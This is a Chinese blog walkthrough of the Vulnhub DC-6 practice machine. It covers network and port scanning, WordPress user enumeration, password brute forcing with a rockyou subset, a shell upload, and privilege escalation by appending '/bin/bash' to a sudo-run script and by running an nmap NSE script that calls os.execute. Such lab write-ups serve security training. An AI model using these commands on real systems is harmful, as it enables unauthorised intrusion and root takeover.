DC-6靶机

最新推荐文章于 2024-10-13 19:14:41 发布
最新推荐文章于 2024-10-13 19:14:41 发布
阅读量71 收藏
点赞数
分类专栏: DC靶机系列 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cgjil/article/details/132392787
版权

搜索靶机的ip地址

arp-scan -l

image-20230806225223028

靶机:192.168.149.145
主机:192.168.149.129

扫描端口

nmap -sS -A 192.168.149.145 -p-

image-20230806230058872

访问80端口,无法访问,但是有显示wordy,需要重新编辑hosts文件

image-20230806230254648

image-20230806230434870

image-20230806231842968

扫描目录

文件扫描:dirsearch -u "http://wordy"

image-20230806231002637

信息收集

登录网站
发现wp-login.php,访问后出现登录界面

在这里插入图片描述

爆破用户名
利用wpscan工具,输入

wpscan --url http://wordy/ -e u

image-20230806232503174

爆破出五个用户名:
admin、mark、graham、sarah、jens

根据靶机简介,可以找到一个密码字典
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

image-20230806233729265

image-20230806234408652

爆破密码
wpscan --url http://wordy/ -e -U use.txt -P passwords.txt

image-20230806235151845

Username: mark, Password: helpdesk01
登录

image-20230806235405863

上传文件

image-20230807172000574

shell上传

上传shell,抓包,并监听端口

image-20230809164156695

交互

在这里插入图片描述

查看用户

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-B8irZcCh-1692518408422)(https://gitee.com/gxxlovehqy/cartographic-bed/raw/master/img/image-20230809201202047.png)]

进入mark 的目录下

在这里插入图片描述

image-20230809201712025

打开文件

image-20230809201813641

找到用户名和密码:graham - GSo7isUM1D4

切换用户

image-20230809201953684

在/home/jens下找到一个文件

在这里插入图片描述

image-20230809205214659

#!/bin/sh表示用/bin/sh解释脚本并执行

添加echo "/bin/bash" >> backups.sh

image-20230809210916183

提权

sudo -u jens ./backups.sh

image-20230809211024864

查看是否有提权的工具

image-20230809211122668

利用 nmap 提权

原理:nmap 可以执行脚本文件,可以创建一个文件并写入反弹 shell 的命令,默认用root 权限执行,所以反弹的 shell 也是 root

echo 'os.execute("/bin/bash")' > shell.nse #创建一个 shell.nse 的文件,并且写入os.execute("/bin/bash")

解释:

--script: 指定自己的脚本文件

image-20230809211222563

sudo -u root nmap --script=shell.nse   #以root用户执行 nmap

image-20230809211454322

cgjil
关注
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
DC-4靶机提权超详细过程
02-29
### DC-4靶机提权超详细过程 #### 一、前言 本文将详细介绍如何在DC-4靶机上进行权限提升的过程,包括利用Kali Linux进行初始渗透测试、爆破登录凭证、获取敏感信息以及最终实现权限提升的具体步骤。通过本教程,...
dc-4靶机练习.docx
01-02
靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
【WEB应用安全测试指南–蓝队安全测试2】--超详细-可直接进行实战!!!亲测-可进行安全及渗透测试
Dreams°的博客
10-10 2008
任意文件下载漏洞不同于网站目录浏览,此漏洞不仅仅可遍历系统下 web中的文件,而且可以浏览或者下载到系统中的文件,攻击人员通过任意文件下载漏洞可以获取系统文件及服务器的配置文件等等。一般来说,他们利用服务器 API、文件标准权限进行攻击。严格来说,任意文件下载漏洞并不是一种 web漏洞,而是网站设计人员的设计“漏洞”
什么是网络安全
m0_66268916的博客
10-07 553
全站防护是基于风险管理和WAAP理念打造的安全方案,以“体系化主动安全” 取代安全产品的简单叠加,为各类Web、API业务等防御来自网络层和应用层的攻击,帮助企业全面提升Web安全水位和安全运营效率。网络安全是指通过采取必要措施,防范对网络的攻击、侵入、干扰、破坏和非法使用以及意外事故,使网络处于稳定可靠运行的状态,以及保障网络数据的完整性、保密性、可用性的能力。网络安全涉及多个层面,包括硬件、软件及其系统中数据的保护和确保网络系统的连续可靠运行,防止数据被破坏、更改、泄露。
ISO 26262标准下的汽车软件架构设计与安全要求
yayuanjingkeji的博客
10-08 408
ISO 26262标准下的汽车软件架构设计与安全要求ISO 26262标准,作为国际公认的汽车功能安全标准,为汽车电子和电气系统的软件开发提供了详尽的指导与规范。在汽车软件架构设计中,遵循ISO 26262标准不仅关乎产品的功能实现,更直接关系到车辆的安全性能。以下将从几个关键方面探讨ISO 26262标准下的汽车软件架构设计。
智能运维与问题诊断工具:提升生产环境的安全稳定性
TechEnthusiast的博客
10-09 329
Prometheus是一个开源的监控和告警系统,而Grafana是一个强大的可视化平台。两者结合使用,可以为系统提供全面的监控和分析能力。ELK Stack是一套强大的日志管理和分析工具集,能够收集、处理、存储和可视化大量日志数据。Datadog是一个全面的监控和分析平台,提供了对应用、服务器、数据库和云服务的实时监控。New Relic提供了全面的应用性能监控和诊断能力,帮助开发团队快速识别和解决问题。PagerDuty是一个事件响应平台,帮助团队快速响应并解决IT事件和中断。
msvcr100.dll丢失的解决方法,如何安全下载 msvcr100.dll 文件:完全指南
电脑修复君的博客
10-11 673
在使用 Windows 操作系统的电脑上运行某些程序或游戏时,可能会遇到一个常见的错误消息,提示缺少 msvcr100.dll 文件。这个 DLL 文件是 Microsoft Visual C++ 2010 Redistributable Package 的一部分,对于运行依赖于 C++ 的软件来说至关重要。如果你正面临 msvcr100.dll 缺失的问题,本文将引导你如何安全地下载并恢复 msvcr100.dll 文件,确保你的应用程序可以顺利运行。
数据中心物理安全的历史和演变
网络研究观
10-10 918
在当今的数字时代,数据中心托管已成为我们互联世界的支柱。
API 数据接口:使用操作流程与安全指南
Noah_ZX的博客
10-07 1077
在当今数字化高速发展的时代,API 数据接口如同构建数字世界的关键纽带,将不同的软件系统和服务紧密连接在一起。无论是企业开发者致力于提升业务效率,还是个人用户追求更便捷的数字体验,深入了解 API 数据接口的使用操作流程以及全力确保其安全性都显得至关重要。
《Web3 安全:攻击与防御全景指南》
sise_2022的博客
10-07 1093
Web3 的出现代表了互联网从中心化向去中心化的过渡,这不仅仅是技术上的升级,更是对现有互联网模式的深刻变革。这一阶段的标志是用户生成内容的爆发、平台经济的兴起,以及互联网巨头的垄断地位。以太坊等区块链平台推动了智能合约和去中心化应用(dApp)的繁荣,去中心化金融(DeFi)、非同质化代币(NFT)以及去中心化自治组织(DAO)等新兴应用正迅速发展,吸引了大量投资和开发者的参与。DAO 的决策过程是公开透明的,参与者可以通过投票等方式直接影响组织的运营,避免了传统组织的集中管理问题。
大模型生图安全疫苗注入赛题解析(DataWhale组队学习)
极限突破者的博客
10-12 829
本文中,我们介绍了全球AI攻防挑战赛的背景和任务,并详细探讨了攻击与防御策略。我们补充了代码实现,包括Prompt诱导与绕过策略、批量优化与自动评估,以及模型防御机制设计。
传统身份安全的局限性
trusfort的博客
10-08 402
为了应对这一现状,业界提出了“零信任”(Zero Trust)的安全模型,而身份安全正是零信任安全模型中最重要的一环。
鸿蒙开发(NEXT/API 12)【安全单元访问开发】网络篇
鸿蒙的技术博客
10-10 500
安全单元(SecureElement,简称SE),电子设备上可能存在一个或多个安全单元,比如有eSE(Embedded SE)和SIM卡。能够充当安全单元的SIM卡,要求具备NFC功能。
PWN二进制安全修仙秘籍【第二章#二进制文件篇02】ELF文件详解
weixin_53801131的博客
10-07 858
形成一个进程镜像,每个进程都拥有独立的虚拟地址空间,这个空间如何布局是由记录在段头表中的程序头决定的。ELF文件头的e_phoff域给出了段头表的位置下面将展示一个可执行文件的程序头👇。
数据交换的金钟罩:合理利用安全数据交换系统,确保信息安全
文件数据安全交换
10-10 1140
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。因此飞驰云联的安全数据交换系统---《Ftrans Ferry跨网文件安全交换系统》,通过建立可管控可审计、防泄露、安全合规的文件交换通道,解决政府单位在网络隔离条件下, 网间数据安全收发、摆渡和共享的难题,易用便捷,充分释放IT部门人力投入。
DVWA CSRF 漏洞实践报告
最新发布
l1x1n0的博客
10-13 749
CSRF(跨站请求伪造)是一种攻击,使得攻击者能够以受害者的身份执行非预期的操作。在靶场DVWA中,我将尝试通过CSRF漏洞更改管理员密码。
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值